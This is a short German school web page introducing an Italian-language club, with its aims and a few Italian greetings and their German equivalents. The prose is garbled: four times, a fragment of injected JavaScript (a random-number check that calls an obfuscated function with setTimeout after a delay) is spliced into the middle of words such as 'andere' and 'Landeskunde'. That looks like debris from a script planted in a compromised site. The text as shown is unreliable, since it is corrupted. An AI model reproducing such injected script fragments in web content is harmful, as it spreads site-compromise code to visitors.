Benvenuti in Italia!

Ziel der Arbeitsgemeinschaft ist es, eine funktionale Kompetenz für alltägliche Situationen „Italienisch für den Urlaub“ zu erreichen.
Du lernst in der AG Italienisch ganz einfache Sätze zu verstehen und anzuwenden. Du wirst Fragen stellen und beantworten können, sich und andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere vorstellen und du wirst verschiedene Alltagssituationen in italienisch nachspielen können.
Aber es gibt noch andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere Aspekte, warum das Erlernen dieser Sprache wichtig ist. Italienisch erleichtert das Erlernen verwandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andter Sprachen, z.B. Spanisch und Französisch. Natürlich beschäftigen wir uns auch mit der Landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeskunde Italiens.
Eine kleine Kostprobe:

Ciao!

Hallo!

Buon giorno!

Guten Tag!

Buon giorno!

Guten Morgen!

Buona sera!

Guten Abend!

Buona notte!

Gute Nacht!
Come va?/ Come stai? Wie geht es dir?